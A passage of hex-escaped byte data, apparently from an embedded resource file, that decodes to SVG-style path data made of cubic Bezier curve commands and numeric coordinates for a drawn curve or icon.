\x30\x32\x33\x33\x35\x37\x30\x39\x20\x43\x20\x38\x2e\x31\x32\x37\
\x39\x34\x31\x39\x39\x31\x31\x34\x20\x31\x31\x2e\x32\x39\x39\x35\
\x35\x32\x35\x33\x37\x35\x20\x38\x2e\x31\x33\x34\x31\x38\x33\x30\
\x35\x39\x39\x38\x20\x31\x31\x2e\x32\x35\x39\x30\x38\x31\x31\x35\
\x39\x39\x20\x38\x2e\x31\x34\x30\x34\x32\x34\x31\x32\x38\x38\x31\
\x20\x31\x31\x2e\x32\x31\x38\x38\x34\x39\x33\x36\x37\x35\x20\x43\
\x20\x38\x2e\x31\x34\x36\x36\x36\x35\x31\x39\x37\x36\x35\x20\x31\
\x31\x2e\x31\x37\x38\x36\x31\x37\x35\x37\x35\x32\x20\x38\x2e\x31\
\x35\x32\x39\x30\x36\x32\x36\x36\x34\x38\x20\x31\x31\x2e\x31\x33\
\x38\x36\x32\x36\x38\x31\x32\x35\x20\x38\x2e\x31\x35\x39\x31\x34\
\x37\x33\x33\x35\x33\x32\x20\x31\x31\x2e\x30\x39\x38\x39\x30\x36\
\x34\x35\x31\x20\x43\x20\x38\x2e\x31\x36\x35\x33\x38\x38\x34\x30\
\x34\x31\x36\x20\x31\x31\x2e\x30\x35\x39\x31\x38\x36\x30\x38\x39\
\x36\x20\x38\x2e\x31\x37\x31\x36\x32\x39\x34\x37\x32\x39\x39\x20\
\x31\x31\x2e\x30\x31\x39\x37\x33\x37\x37\x35\x39\x20\x38\x2e\x31\
\x37\x37\x38\x37\x30\x35\x34\x31\x38\x33\x20\x31\x30\x2e\x39\x38\
\x30\x35\x39\x30\x32\x32\x37\x38\x20\x43\x20\x38\x2e\x31\x38\x34\
\x31\x31\x31\x36\x31\x30\x36\x36\x20\x31\x30\x2e\x39\x34\x31\x34\
\x34\x32\x36\x39\x36\x36\x20\x38\x2e\x31\x39\x30\x33\x35\x32\x36\
\x37\x39\x35\x20\x31\x30\x2e\x39\x30\x32\x35\x39\x37\x37\x37\x37\
\x20\x38\x2e\x31\x39\x36\x35\x39\x33\x37\x34\x38\x33\x34\x20\x31\
\x30\x2e\x38\x36\x34\x30\x38\x33\x35\x38\x39\x38\x20\x43\x20\x38\
\x2e\x32\x30\x32\x38\x33\x34\x38\x31\x37\x31\x37\x20\x31\x30\x2e\
\x38\x32\x35\x35\x36\x39\x34\x30\x32\x36\x20\x38\x2e\x32\x30\x39\
\x30\x37\x35\x38\x38\x36\x30\x31\x20\x31\x30\x2e\x37\x38\x37\x33\
\x38\x37\x39\x34\x30\x31\x20\x38\x2e\x32\x31\x35\x33\x31\x36\x39\
\x35\x34\x38\x34\x20\x31\x30\x2e\x37\x34\x39\x35\x36\x36\x36\x33\
\x31\x37\x20\x43\x20\x38\x2e\x32\x32\x31\x35\x35\x38\x30\x32\x33\
\x36\x38\x20\x31\x30\x2e\x37\x31\x31\x37\x34\x35\x33\x32\x33\x33\
\x20\x38\x2e\x32\x32\x37\x37\x39\x39\x30\x39\x32\x35\x32\x20\x31\
\x30\x2e\x36\x37\x34\x32\x38\x36\x33\x33\x38\x33\x20\x38\x2e\x32\
\x33\x34\x30\x34\x30\x31\x36\x31\x33\x35\x20\x31\x30\x2e\x36\x33\
\x37\x32\x31\x36\x33\x37\x32\x35\x20\x43\x20\x38\x2e\x32\x34\x30\
\x32\x38\x31\x32\x33\x30\x31\x39\x20\x31\x30\x2e\x36\x30\x30\x31\
\x34\x36\x34\x30\x36\x37\x20\x38\x2e\x32\x34\x36\x35\x32\x32\x32\
\x39\x39\x30\x32\x20\x31\x30\x2e\x35\x36\x33\x34\x36\x37\x38\x30\
\x33\x20\x38\x2e\x32\x35\x32\x37\x36\x33\x33\x36\x37\x38\x36\x20\
\x31\x30\x2e\x35\x32\x37\x32\x30\x36\x34\x38\x32\x31\x20\x43\x20\
\x38\x2e\x32\x35\x39\x30\x30\x34\x34\x33\x36\x37\x20\x31\x30\x2e\
\x34\x39\x30\x39\x34\x35\x31\x36\x31\x32\x20\x38\x2e\x32\x36\x35\
\x32\x34\x35\x35\x30\x35\x35\x33\x20\x31\x30\x2e\x34\x35\x35\x31\
\x30\x33\x36\x33\x36\x31\x20\x38\x2e\x32\x37\x31\x34\x38\x36\x35\
\x37\x34\x33\x37\x20\x31\x30\x2e\x34\x31\x39\x37\x30\x37\x30\x31\
\x32\x36\x20\x43\x20\x38\x2e\x32\x37\x37\x37\x32\x37\x36\x34\x33\
\x32\x20\x31\x30\x2e\x33\x38\x34\x33\x31\x30\x33\x38\x39\x20\x38\
\x2e\x32\x38\x33\x39\x36\x38\x37\x31\x32\x30\x34\x20\x31\x30\x2e\
\x33\x34\x39\x33\x36\x31\x33\x34\x36\x20\x38\x2e\x32\x39\x30\x32\
\x30\x39\x37\x38\x30\x38\x38\x20\x31\x30\x2e\x33\x31\x34\x38\x38\
\x34\x31\x33\x35\x34\x20\x43\x20\x38\x2e\x32\x39\x36\x34\x35\x30\
\x38\x34\x39\x37\x31\x20\x31\x30\x2e\x32\x38\x30\x34\x30\x36\x39\
\x32\x34\x38\x20\x38\x2e\x33\x30\x32\x36\x39\x31\x39\x31\x38\x35\
\x35\x20\x31\x30\x2e\x32\x34\x36\x34\x30\x34\x33\x38\x37\x37\x20\
\x38\x2e\x33\x30\x38\x39\x33\x32\x39\x38\x37\x33\x38\x20\x31\x30\
\x2e\x32\x31\x32\x38\x39\x39\x38\x38\x34\x36\x20\x43\x20\x38\x2e\
\x33\x31\x35\x31\x37\x34\x30\x35\x36\x32\x32\x20\x31\x30\x2e\x31\
\x37\x39\x33\x39\x35\x33\x38\x31\x36\x20\x38\x2e\x33\x32\x31\x34\
\x31\x35\x31\x32\x35\x30\x36\x20\x31\x30\x2e\x31\x34\x36\x33\x39\
\x31\x39\x31\x31\x31\x20\x38\x2e\x33\x32\x37\x36\x35\x36\x31\x39\
\x33\x38\x39\x20\x31\x30\x2e\x31\x31\x33\x39\x31\x31\x39\x30\x36\
\x34\x20\x43\x20\x38\x2e\x33\x33\x33\x38\x39\x37\x32\x36\x32\x37\
\x33\x20\x31\x30\x2e\x30\x38\x31\x34\x33\x31\x39\x30\x31\x37\x20\
\x38\x2e\x33\x34\x30\x31\x33\x38\x33\x33\x31\x35\x36\x20\x31\x30\
\x2e\x30\x34\x39\x34\x37\x38\x35\x31\x34\x33\x20\x38\x2e\x33\x34\
\x36\x33\x37\x39\x34\x30\x30\x34\x20\x31\x30\x2e\x30\x31\x38\x30\
\x37\x33\x32\x31\x35\x33\x20\x43\x20\x38\x2e\x33\x35\x32\x36\x32\
\x30\x34\x36\x39\x32\x34\x20\x39\x2e\x39\x38\x36\x36\x36\x37\x39\
\x31\x36\x32\x36\x20\x38\x2e\x33\x35\x38\x38\x36\x31\x35\x33\x38\
\x30\x37\x20\x39\x2e\x39\x35\x35\x38\x31\x34\x30\x30\x35\x30\x39\
\x20\x38\x2e\x33\x36\x35\x31\x30\x32\x36\x30\x36\x39\x31\x20\x39\
\x2e\x39\x32\x35\x35\x33\x31\x39\x35\x37\x36\x37\x20\x43\x20\x38\
\x2e\x33\x37\x31\x33\x34\x33\x36\x37\x35\x37\x34\x20\x39\x2e\x38\
\x39\x35\x32\x34\x39\x39\x31\x30\x32\x35\x20\x38\x2e\x33\x37\x37\
\x35\x38\x34\x37\x34\x34\x35\x38\x20\x39\x2e\x38\x36\x35\x35\x34\
\x33\x31\x36\x38\x39\x37\x20\x38\x2e\x33\x38\x33\x38\x32\x35\x38\
\x31\x33\x34\x32\x20\x39\x2e\x38\x33\x36\x34\x33\x31\x31\x38\x32\
\x38\x31\x20\x43\x20\x38\x2e\x33\x39\x30\x30\x36\x36\x38\x38\x32\
\x32\x35\x20\x39\x2e\x38\x30\x37\x33\x31\x39\x31\x39\x36\x36\x35\
\x20\x38\x2e\x33\x39\x36\x33\x30\x37\x39\x35\x31\x30\x39\x20\x39\
\x2e\x37\x37\x38\x38\x30\x35\x35\x34\x35\x36\x32\x20\x38\x2e\x34\
\x30\x32\x35\x34\x39\x30\x31\x39\x39\x32\x20\x39\x2e\x37\x35\x30\
\x39\x30\x38\x36\x32\x31\x37\x31\x20\x43\x20\x38\x2e\x34\x30\x38\
\x37\x39\x30\x30\x38\x38\x37\x36\x20\x39\x2e\x37\x32\x33\x30\x31\
\x31\x36\x39\x37\x38\x20\x38\x2e\x34\x31\x35\x30\x33\x31\x31\x35\
\x37\x36\x20\x39\x2e\x36\x39\x35\x37\x33\x35\x32\x31\x33\x31\x32\
\x20\x38\x2e\x34\x32\x31\x32\x37\x32\x32\x32\x36\x34\x33\x20\x39\
\x2e\x36\x36\x39\x30\x39\x36\x34\x37\x34\x32\x32\x20\x43\x20\x38\
\x2e\x34\x32\x37\x35\x31\x33\x32\x39\x35\x32\x37\x20\x39\x2e\x36\
\x34\x32\x34\x35\x37\x37\x33\x35\x33\x32\x20\x38\x2e\x34\x33\x33\
\x37\x35\x34\x33\x36\x34\x31\x31\x20\x39\x2e\x36\x31\x36\x34\x36\
\x30\x35\x38\x30\x36\x38\x20\x38\x2e\x34\x33\x39\x39\x39\x35\x34\
\x33\x32\x39\x34\x20\x39\x2e\x35\x39\x31\x31\x32\x31\x32\x30\x34\
\x36\x36\x20\x43\x20\x38\x2e\x34\x34\x36\x32\x33\x36\x35\x30\x31\
\x37\x38\x20\x39\x2e\x35\x36\x35\x37\x38\x31\x38\x32\x38\x36\x35\
\x20\x38\x2e\x34\x35\x32\x34\x37\x37\x35\x37\x30\x36\x31\x20\x39\
\x2e\x35\x34\x31\x31\x30\x34\x31\x39\x30\x31\x35\x20\x38\x2e\x34\
\x35\x38\x37\x31\x38\x36\x33\x39\x34\x35\x20\x39\x2e\x35\x31\x37\
\x31\x30\x33\x33\x34\x36\x33\x35\x20\x43\x20\x38\x2e\x34\x36\x34\
\x39\x35\x39\x37\x30\x38\x32\x39\x20\x39\x2e\x34\x39\x33\x31\x30\
\x32\x35\x30\x32\x35\x36\x20\x38\x2e\x34\x37\x31\x32\x30\x30\x37\
\x37\x37\x31\x32\x20\x39\x2e\x34\x36\x39\x37\x38\x32\x35\x32\x36\
\x36\x33\x20\x38\x2e\x34\x37\x37\x34\x34\x31\x38\x34\x35\x39\x36\
\x20\x39\x2e\x34\x34\x37\x31\x35\x37\x33\x31\x35\x32\x39\x20\x43\
\x20\x38\x2e\x34\x38\x33\x36\x38\x32\x39\x31\x34\x37\x39\x20\x39\
\x2e\x34\x32\x34\x35\x33\x32\x31\x30\x33\x39\x35\x20\x38\x2e\x34\
\x38\x39\x39\x32\x33\x39\x38\x33\x36\x33\x20\x39\x2e\x34\x30\x32\
\x36\x30\x35\x38\x33\x38\x33\x37\x20\x38\x2e\x34\x39\x36\x31\x36\
\x35\x30\x35\x32\x34\x37\x20\x39\x2e\x33\x38\x31\x33\x39\x31\x32\
\x33\x33\x32\x39\x20\x43\x20\x38\x2e\x35\x30\x32\x34\x30\x36\x31\
\x32\x31\x33\x20\x39\x2e\x33\x36\x30\x31\x37\x36\x36\x32\x38\x32\
\x31\x20\x38\x2e\x35\x30\x38\x36\x34\x37\x31\x39\x30\x31\x34\x20\
\x39\x2e\x33\x33\x39\x36\x37\x37\x39\x36\x36\x33\x35\x20\x38\x2e\
\x35\x31\x34\x38\x38\x38\x32\x35\x38\x39\x37\x20\x39\x2e\x33\x31\
\x39\x39\x30\x36\x37\x36\x30\x38\x34\x20\x43\x20\x38\x2e\x35\x32\
\x31\x31\x32\x39\x33\x32\x37\x38\x31\x20\x39\x2e\x33\x30\x30\x31\
\x33\x35\x35\x35\x35\x33\x33\x20\x38\x2e\x35\x32\x37\x33\x37\x30\
\x33\x39\x36\x36\x35\x20\x39\x2e\x32\x38\x31\x30\x39\x36\x31\x38\
\x33\x37\x39\x20\x38\x2e\x35\x33\x33\x36\x31\x31\x34\x36\x35\x34\
\x38\x20\x39\x2e\x32\x36\x32\x37\x39\x38\x39\x33\x39\x39\x36\x20\
\x43\x20\x38\x2e\x35\x33\x39\x38\x35\x32\x35\x33\x34\x33\x32\x20\
\x39\x2e\x32\x34\x34\x35\x30\x31\x36\x39\x36\x31\x33\x20\x38\x2e\
\x35\x34\x36\x30\x39\x33\x36\x30\x33\x31\x35\x20\x39\x2e\x32\x32\
\x36\x39\x35\x31\x30\x34\x35\x37\x38\x20\x38\x2e\x35\x35\x32\x33\
\x33\x34\x36\x37\x31\x39\x39\x20\x39\x2e\x32\x31\x30\x31\x35\x36\
\x30\x34\x37\x33\x31\x20\x43\x20\x38\x2e\x35\x35\x38\x35\x37\x35\
\x37\x34\x30\x38\x33\x20\x39\x2e\x31\x39\x33\x33\x36\x31\x30\x34\
\x38\x38\x34\x20\x38\x2e\x35\x36\x34\x38\x31\x36\x38\x30\x39\x36\
\x36\x20\x39\x2e\x31\x37\x37\x33\x32\x36\x32\x34\x39\x32\x37\x20\
\x38\x2e\x35\x37\x31\x30\x35\x37\x38\x37\x38\x35\x20\x39\x2e\x31\
\x36\x32\x30\x35\x39\x34\x35\x37\x36\x39\x20\x43\x20\x38\x2e\x35\
\x37\x37\x32\x39\x38\x39\x34\x37\x33\x33\x20\x39\x2e\x31\x34\x36\
\x37\x39\x32\x36\x36\x36\x31\x20\x38\x2e\x35\x38\x33\x35\x34\x30\
\x30\x31\x36\x31\x37\x20\x39\x2e\x31\x33\x32\x32\x39\x38\x35\x30\
\x33\x37\x34\x20\x38\x2e\x35\x38\x39\x37\x38\x31\x30\x38\x35\x30\
\x31\x20\x39\x2e\x31\x31\x38\x35\x38\x33\x35\x31\x38\x32\x38\x20\
\x43\x20\x38\x2e\x35\x39\x36\x30\x32\x32\x31\x35\x33\x38\x34\x20\
\x39\x2e\x31\x30\x34\x38\x36\x38\x35\x33\x32\x38\x32\x20\x38\x2e\
\x36\x30\x32\x32\x36\x33\x32\x32\x32\x36\x38\x20\x39\x2e\x30\x39\
\x31\x39\x33\x37\x34\x31\x32\x35\x38\x20\x38\x2e\x36\x30\x38\x35\
\x30\x34\x32\x39\x31\x35\x31\x20\x39\x2e\x30\x37\x39\x37\x39\x35\
\x34\x33\x33\x37\x31\x20\x43\x20\x38\x2e\x36\x31\x34\x37\x34\x35\
\x33\x36\x30\x33\x35\x20\x39\x2e\x30\x36\x37\x36\x35\x33\x34\x35\
\x34\x38\x35\x20\x38\x2e\x36\x32\x30\x39\x38\x36\x34\x32\x39\x31\
\x39\x20\x39\x2e\x30\x35\x36\x33\x30\x35\x33\x36\x35\x35\x32\x20\
\x38\x2e\x36\x32\x37\x32\x32\x37\x34\x39\x38\x30\x32\x20\x39\x2e\
\x30\x34\x35\x37\x35\x35\x31\x36\x32\x31\x39\x20\x43\x20\x38\x2e\
\x36\x33\x33\x34\x36\x38\x35\x36\x36\x38\x36\x20\x39\x2e\x30\x33\
\x35\x32\x30\x34\x39\x35\x38\x38\x37\x20\x38\x2e\x36\x33\x39\x37\
\x30\x39\x36\x33\x35\x36\x39\x20\x39\x2e\x30\x32\x35\x34\x35\x37\
\x34\x34\x32\x32\x20\x38\x2e\x36\x34\x35\x39\x35\x30\x37\x30\x34\
\x35\x33\x20\x39\x2e\x30\x31\x36\x35\x31\x35\x33\x32\x32\x38\x20\
\x43\x20\x38\x2e\x36\x35\x32\x31\x39\x31\x37\x37\x33\x33\x37\x20\
\x39\x2e\x30\x30\x37\x35\x37\x33\x32\x30\x33\x34\x20\x38\x2e\x36\
\x35\x38\x34\x33\x32\x38\x34\x32\x32\x20\x38\x2e\x39\x39\x39\x34\
\x34\x31\x33\x32\x36\x39\x39\x20\x38\x2e\x36\x36\x34\x36\x37\x33\
\x39\x31\x31\x30\x34\x20\x38\x2e\x39\x39\x32\x31\x32\x31\x31\x31\
\x34\x31\x35\x20\x43\x20\x38\x2e\x36\x37\x30\x39\x31\x34\x39\x37\
\x39\x38\x37\x20\x38\x2e\x39\x38\x34\x38\x30\x30\x39\x30\x31\x33\
\x31\x20\x38\x2e\x36\x37\x37\x31\x35\x36\x30\x34\x38\x37\x31\x20\
\x38\x2e\x39\x37\x38\x32\x39\x37\x32\x33\x35\x33\x33\x20\x38\x2e\
\x36\x38\x33\x33\x39\x37\x31\x31\x37\x35\x35\x20\x38\x2e\x39\x37\
\x32\x36\x31\x30\x32\x34\x34\x35\x35\x20\x43\x20\x38\x2e\x36\x38\
\x39\x36\x33\x38\x31\x38\x36\x33\x38\x20\x38\x2e\x39\x36\x36\x39\
\x32\x33\x32\x35\x33\x37\x38\x20\x38\x2e\x36\x39\x35\x38\x37\x39\
\x32\x35\x35\x32\x32\x20\x38\x2e\x39\x36\x32\x30\x35\x37\x38\x35\
\x31\x35\x32\x20\x38\x2e\x37\x30\x32\x31\x32\x30\x33\x32\x34\x30\
\x36\x20\x38\x2e\x39\x35\x38\x30\x31\x32\x38\x37\x33\x36\x39\x20\
\x43\x20\x38\x2e\x37\x30\x38\x33\x36\x31\x33\x39\x32\x38\x39\x20\
\x38\x2e\x39\x35\x33\x39\x36\x37\x38\x39\x35\x38\x37\x20\x38\x2e\
\x37\x31\x34\x36\x30\x32\x34\x36\x31\x37\x33\x20\x38\x2e\x39\x35\
\x30\x37\x34\x38\x32\x37\x38\x32\x32\x20\x38\x2e\x37\x32\x30\x38\
\x34\x33\x35\x33\x30\x35\x36\x20\x38\x2e\x39\x34\x38\x33\x35\x31\
\x35\x36\x36\x30\x33\x20\x43\x20\x38\x2e\x37\x32\x37\x30\x38\x34\
\x35\x39\x39\x34\x20\x38\x2e\x39\x34\x35\x39\x35\x34\x38\x35\x33\
\x38\x34\x20\x38\x2e\x37\x33\x33\x33\x32\x35\x36\x36\x38\x32\x34\
\x20\x38\x2e\x39\x34\x34\x33\x38\x35\x39\x39\x37\x36\x35\x20\x38\
\x2e\x37\x33\x39\x35\x36\x36\x37\x33\x37\x30\x37\x20\x38\x2e\x39\
\x34\x33\x36\x34\x31\x32\x35\x35\x39\x20\x43\x20\x38\x2e\x37\x34\
\x35\x38\x30\x37\x38\x30\x35\x39\x31\x20\x38\x2e\x39\x34\x32\x38\
\x39\x36\x35\x31\x34\x31\x35\x20\x38\x2e\x37\x35\x32\x30\x34\x38\
\x38\x37\x34\x37\x34\x20\x38\x2e\x39\x34\x32\x39\x38\x30\x38\x34\
\x34\x35\x35\x20\x38\x2e\x37\x35\x38\x32\x38\x39\x39\x34\x33\x35\
\x38\x20\x38\x2e\x39\x34\x33\x38\x38\x39\x32\x32\x34\x34\x36\x20\
\x43\x20\x38\x2e\x37\x36\x34\x35\x33\x31\x30\x31\x32\x34\x32\x20\
\x38\x2e\x39\x34\x34\x37\x39\x37\x36\x30\x34\x33\x37\x20\x38\x2e\
\x37\x37\x30\x37\x37\x32\x30\x38\x31\x32\x35\x20\x38\x2e\x39\x34\
\x36\x35\x33\x34\x39\x39\x30\x39\x39\x20\x38\x2e\x37\x37\x37\x30\
\x31\x33\x31\x35\x30\x30\x39\x20\x38\x2e\x39\x34\x39\x30\x39\x35\
\x30\x38\x38\x34\x20\x43\x20\x38\x2e\x37\x38\x33\x32\x35\x34\x32\
\x31\x38\x39\x32\x20\x38\x2e\x39\x35\x31\x36\x35\x35\x31\x38\x35\
\x38\x20\x38\x2e\x37\x38\x39\x34\x39\x35\x32\x38\x37\x37\x36\x20\
\x38\x2e\x39\x35\x35\x30\x34\x32\x39\x34\x33\x30\x31\x20\x38\x2e\
\x37\x39\x35\x37\x33\x36\x33\x35\x36\x36\x20\x38\x2e\x39\x35\x39\
\x32\x35\x30\x38\x30\x30\x35\x34\x20\x43\x20\x38\x2e\x38\x30\x31\
\x39\x37\x37\x34\x32\x35\x34\x33\x20\x38\x2e\x39\x36\x33\x34\x35\
\x38\x36\x35\x38\x30\x37\x20\x38\x2e\x38\x30\x38\x32\x31\x38\x34\
\x39\x34\x32\x37\x20\x38\x2e\x39\x36\x38\x34\x39\x31\x35\x34\x39\
\x31\x32\x20\x38\x2e\x38\x31\x34\x34\x35\x39\x35\x36\x33\x31\x20\
\x38\x2e\x39\x37\x34\x33\x34\x30\x36\x36\x32\x33\x31\x20\x43\x20\
\x38\x2e\x38\x32\x30\x37\x30\x30\x36\x33\x31\x39\x34\x20\x38\x2e\
\x39\x38\x30\x31\x38\x39\x37\x37\x35\x35\x31\x20\x38\x2e\x38\x32\
\x36\x39\x34\x31\x37\x30\x30\x37\x38\x20\x38\x2e\x39\x38\x36\x38\
\x36\x30\x30\x32\x30\x35\x39\x20\x38\x2e\x38\x33\x33\x31\x38\x32\
\x37\x36\x39\x36\x31\x20\x38\x2e\x39\x39\x34\x33\x34\x31\x33\x34\
\x37\x39\x36\x20\x43\x20\x38\x2e\x38\x33\x39\x34\x32\x33\x38\x33\
\x38\x34\x35\x20\x39\x2e\x30\x30\x31\x38\x32\x32\x36\x37\x35\x33\
\x32\x20\x38\x2e\x38\x34\x35\x36\x36\x34\x39\x30\x37\x32\x38\x20\
\x39\x2e\x30\x31\x30\x31\x31\x39\x39\x36\x33\x36\x36\x20\x38\x2e\
\x38\x35\x31\x39\x30\x35\x39\x37\x36\x31\x32\x20\x39\x2e\x30\x31\
\x39\x32\x32\x31\x39\x34\x30\x36\x34\x20\x43\x20\x38\x2e\x38\x35\
\x38\x31\x34\x37\x30\x34\x34\x39\x36\x20\x39\x2e\x30\x32\x38\x33\
\x32\x33\x39\x31\x37\x36\x32\x20\x38\x2e\x38\x36\x34\x33\x38\x38\
\x31\x31\x33\x37\x39\x20\x39\x2e\x30\x33\x38\x32\x33\x35\x34\x32\
\x33\x33\x35\x20\x38\x2e\x38\x37\x30\x36\x32\x39\x31\x38\x32\x36\
\x33\x20\x39\x2e\x30\x34\x38\x39\x34\x33\x39\x38\x30\x32\x31\x20\
\x43\x20\x38\x2e\x38\x37\x36\x38\x37\x30\x32\x35\x31\x34\x36\x20\
\x39\x2e\x30\x35\x39\x36\x35\x32\x35\x33\x37\x30\x36\x20\x38\x2e\
\x38\x38\x33\x31\x31\x31\x33\x32\x30\x33\x20\x39\x2e\x30\x37\x31\
\x31\x36\x32\x39\x33\x39\x31\x20\x38\x2e\x38\x38\x39\x33\x35\x32\
\x33\x38\x39\x31\x34\x20\x39\x2e\x30\x38\x33\x34\x36\x31\x35\x32\
\x32\x36\x36\x20\x43\x20\x38\x2e\x38\x39\x35\x35\x39\x33\x34\x35\
\x37\x39\x37\x20\x39\x2e\x30\x39\x35\x37\x36\x30\x31\x30\x36\x32\
\x33\x20\x38\x2e\x39\x30\x31\x38\x33\x34\x35\x32\x36\x38\x31\x20\
\x39\x2e\x31\x30\x38\x38\x35\x31\x36\x31\x31\x39\x20\x38\x2e\x39\
\x30\x38\x30\x37\x35\x35\x39\x35\x36\x34\x20\x39\x2e\x31\x32\x32\
\x37\x32\x31\x32\x31\x31\x31\x36\x20\x43\x20\x38\x2e\x39\x31\x34\
\x33\x31\x36\x36\x36\x34\x34\x38\x20\x39\x2e\x31\x33\x36\x35\x39\
\x30\x38\x31\x30\x34\x31\x20\x38\x2e\x39\x32\x30\x35\x35\x37\x37\
\x33\x33\x33\x32\x20\x39\x2e\x31\x35\x31\x32\x34\x33\x31\x38\x33\
\x30\x32\x20\x38\x2e\x39\x32\x36\x37\x39\x38\x38\x30\x32\x31\x35\
\x20\x39\x2e\x31\x36\x36\x36\x36\x32\x33\x35\x38\x35\x20\x43\x20\
\x38\x2e\x39\x33\x33\x30\x33\x39\x38\x37\x30\x39\x39\x20\x39\x2e\
\x31\x38\x32\x30\x38\x31\x35\x33\x33\x39\x37\x20\x38\x2e\x39\x33\
\x39\x32\x38\x30\x39\x33\x39\x38\x32\x20\x39\x2e\x31\x39\x38\x32\
\x37\x32\x31\x32\x34\x30\x34\x20\x38\x2e\x39\x34\x35\x35\x32\x32\
\x30\x30\x38\x36\x36\x20\x39\x2e\x32\x31\x35\x32\x31\x37\x30\x34\
\x30\x39\x34\x20\x43\x20\x38\x2e\x39\x35\x31\x37\x36\x33\x30\x37\
\x37\x35\x20\x39\x2e\x32\x33\x32\x31\x36\x31\x39\x35\x37\x38\x34\
\x20\x38\x2e\x39\x35\x38\x30\x30\x34\x31\x34\x36\x33\x33\x20\x39\
\x2e\x32\x34\x39\x38\x36\x35\x37\x33\x38\x31\x33\x20\x38\x2e\x39\
\x36\x34\x32\x34\x35\x32\x31\x35\x31\x37\x20\x39\x2e\x32\x36\x38\
\x33\x31\x30\x32\x30\x33\x31\x38\x20\x43\x20\x38\x2e\x39\x37\x30\
\x34\x38\x36\x32\x38\x34\x30\x31\x20\x39\x2e\x32\x38\x36\x37\x35\
\x34\x36\x36\x38\x32\x34\x20\x38\x2e\x39\x37\x36\x37\x32\x37\x33\
\x35\x32\x38\x34\x20\x39\x2e\x33\x30\x35\x39\x34\x34\x32\x37\x32\
\x34\x34\x20\x38\x2e\x39\x38\x32\x39\x36\x38\x34\x32\x31\x36\x38\
\x20\x39\x2e\x33\x32\x35\x38\x35\x39\x37\x37\x34\x34\x20\x43\x20\
\x38\x2e\x39\x38\x39\x32\x30\x39\x34\x39\x30\x35\x31\x20\x39\x2e\
\x33\x34\x35\x37\x37\x35\x32\x37\x36\x33\x36\x20\x38\x2e\x39\x39\
\x35\x34\x35\x30\x35\x35\x39\x33\x35\x20\x39\x2e\x33\x36\x36\x34\
\x32\x31\x30\x34\x31\x33\x39\x20\x39\x2e\x30\x30\x31\x36\x39\x31\
\x36\x32\x38\x31\x39\x20\x39\x2e\x33\x38\x37\x37\x37\x36\x37\x39\
\x35\x30\x39\x20\x43\x20\x39\x2e\x30\x30\x37\x39\x33\x32\x36\x39\
\x37\x30\x32\x20\x39\x2e\x34\x30\x39\x31\x33\x32\x35\x34\x38\x37\
\x38\x20\x39\x2e\x30\x31\x34\x31\x37\x33\x37\x36\x35\x38\x36\x20\
\x39\x2e\x34\x33\x31\x32\x30\x32\x35\x36\x30\x36\x35\x20\x39\x2e\
\x30\x32\x30\x34\x31\x34\x38\x33\x34\x36\x39\x20\x39\x2e\x34\x35\
\x33\x39\x36\x35\x35\x35\x34\x35\x39\x20\x43\x20\x39\x2e\x30\x32\
\x36\x36\x35\x35\x39\x30\x33\x35\x33\x20\x39\x2e\x34\x37\x36\x37\
\x32\x38\x35\x34\x38\x35\x34\x20\x39\x2e\x30\x33\x32\x38\x39\x36\
\x39\x37\x32\x33\x37\x20\x39\x2e\x35\x30\x30\x31\x38\x38\x36\x39\
\x31\x36\x36\x20\x39\x2e\x30\x33\x39\x31\x33\x38\x30\x34\x31\x32\
\x20\x39\x2e\x35\x32\x34\x33\x32\x33\x37\x33\x39\x30\x36\x20\x43\
\x20\x39\x2e\x30\x34\x35\x33\x37\x39\x31\x31\x30\x30\x34\x20\x39\
\x2e\x35\x34\x38\x34\x35\x38\x37\x38\x36\x34\x36\x20\x39\x2e\x30\
\x35\x31\x36\x32\x30\x31\x37\x38\x38\x37\x20\x39\x2e\x35\x37\x33\
\x32\x37\x32\x37\x39\x36\x34\x20\x39\x2e\x30\x35\x37\x38\x36\x31\
\x32\x34\x37\x37\x31\x20\x39\x2e\x35\x39\x38\x37\x34\x32\x35\x38\
\x39\x35\x37\x20\x43\x20\x39\x2e\x30\x36\x34\x31\x30\x32\x33\x31\
\x36\x35\x35\x20\x39\x2e\x36\x32\x34\x32\x31\x32\x33\x38\x32\x37\
\x33\x20\x39\x2e\x30\x37\x30\x33\x34\x33\x33\x38\x35\x33\x38\x20\
\x39\x2e\x36\x35\x30\x33\x34\x31\x39\x30\x32\x32\x36\x20\x39\x2e\
\x30\x37\x36\x35\x38\x34\x34\x35\x34\x32\x32\x20\x39\x2e\x36\x37\
\x37\x31\x30\x37\x30\x37\x30\x32\x37\x20\x43\x20\x39\x2e\x30\x38\
\x32\x38\x32\x35\x35\x32\x33\x30\x35\x20\x39\x2e\x37\x30\x33\x38\
\x37\x32\x32\x33\x38\x32\x38\x20\x39\x2e\x30\x38\x39\x30\x36\x36\
\x35\x39\x31\x38\x39\x20\x39\x2e\x37\x33\x31\x32\x37\x36\x38\x37\
\x36\x36\x37\x20\x39\x2e\x30\x39\x35\x33\x30\x37\x36\x36\x30\x37\
\x33\x20\x39\x2e\x37\x35\x39\x32\x39\x36\x30\x34\x36\x32\x31\x20\
\x43\x20\x39\x2e\x31\x30\x31\x35\x34\x38\x37\x32\x39\x35\x36\x20\
\x39\x2e\x37\x38\x37\x33\x31\x35\x32\x31\x35\x37\x35\x20\x39\x2e\
\x31\x30\x37\x37\x38\x39\x37\x39\x38\x34\x20\x39\x2e\x38\x31\x35\
\x39\x35\x32\x36\x31\x31\x32\x32\x20\x39\x2e\x31\x31\x34\x30\x33\
\x30\x38\x36\x37\x32\x33\x20\x39\x2e\x38\x34\x35\x31\x38\x32\x34\
\x37\x30\x35\x37\x20\x43\x20\x39\x2e\x31\x32\x30\x32\x37\x31\x39\
\x33\x36\x30\x37\x20\x39\x2e\x38\x37\x34\x34\x31\x32\x33\x32\x39\
\x39\x32\x20\x39\x2e\x31\x32\x36\x35\x31\x33\x30\x30\x34\x39\x31\
\x20\x39\x2e\x39\x30\x34\x32\x33\x38\x32\x31\x35\x30\x39\x20\x39\
\x2e\x31\x33\x32\x37\x35\x34\x30\x37\x33\x37\x34\x20\x39\x2e\x39\
\x33\x34\x36\x33\x33\x35\x38\x31\x30\x35\x20\x43\x20\x39\x2e\x31\
\x33\x38\x39\x39\x35\x31\x34\x32\x35\x38\x20\x39\x2e\x39\x36\x35\
\x30\x32\x38\x39\x34\x37\x30\x31\x20\x39\x2e\x31\x34\x35\x32\x33\
\x36\x32\x31\x31\x34\x31\x20\x39\x2e\x39\x39\x35\x39\x39\x37\x32\
\x31\x37\x33\x36\x20\x39\x2e\x31\x35\x31\x34\x37\x37\x32\x38\x30\
